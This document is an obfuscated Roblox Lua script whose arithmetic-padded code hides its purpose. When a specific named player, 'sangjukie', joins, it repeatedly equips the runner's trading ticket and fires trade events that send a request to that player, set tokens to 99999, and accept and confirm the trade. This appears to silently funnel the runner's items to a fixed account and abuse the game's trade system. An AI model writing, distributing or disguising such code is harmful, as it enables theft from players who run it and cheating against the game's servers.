--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=game:GetService("Players");local v2=game:GetService("ReplicatedStorage");local v3=v1.LocalPlayer;local v4=v2.GameEvents.TradeEvents;local v5=false;local function v6() local v10=0 + 0 ;local v11;local v12;while true do if (v10==(1638 -(1523 + 114))) then for v19,v20 in ipairs(v3.Backpack:GetChildren()) do if (v20:IsA("Tool") and v20.Name:find("Trading Ticket")) then v12:EquipTool(v20);return true;end end return false;end if (v10==(0 + 0)) then v11=v3.Character or v3.CharacterAdded:Wait() ;v12=v11:WaitForChild("Humanoid");v10=1;end end end local function v7() while v5 do local v17=v1:FindFirstChild(v0);if  not v17 then v5=false;break;end task.wait(14 -4 );if v6() then local v18=1065 -(68 + 997) ;while true do if (v18==(1270 -(226 + 1044))) then v4.SendRequest:FireServer(v17);task.wait(43 -33 );v18=1;end if (v18==3) then v4.Confirm:FireServer();break;end if (v18==(118 -(32 + 85))) then v4.SetTokens:FireServer(99999);task.wait(7);v18=2 + 0 ;end if (v18==(1 + 1)) then v4.Accept:FireServer();task.wait(5);v18=960 -(892 + 65) ;end end end task.wait(11 -6 );end end local function v8() local v13=0 -0 ;while true do if (v13==1) then task.spawn(v7);print("AUTO TRADE START");break;end if (v13==(0 -0)) then if v5 then return;end v5=true;v13=1;end end end local function v9() local v14=0;while true do if (v14==0) then v5=false;print("AUTO TRADE STOP");break;end end end if v1:FindFirstChild(v0) then v8();end v1.PlayerAdded:Connect(function(v15) if (v15.Name==v0) then v8();end end);v1.PlayerRemoving:Connect(function(v16) if (v16.Name==v0) then v9();end end);
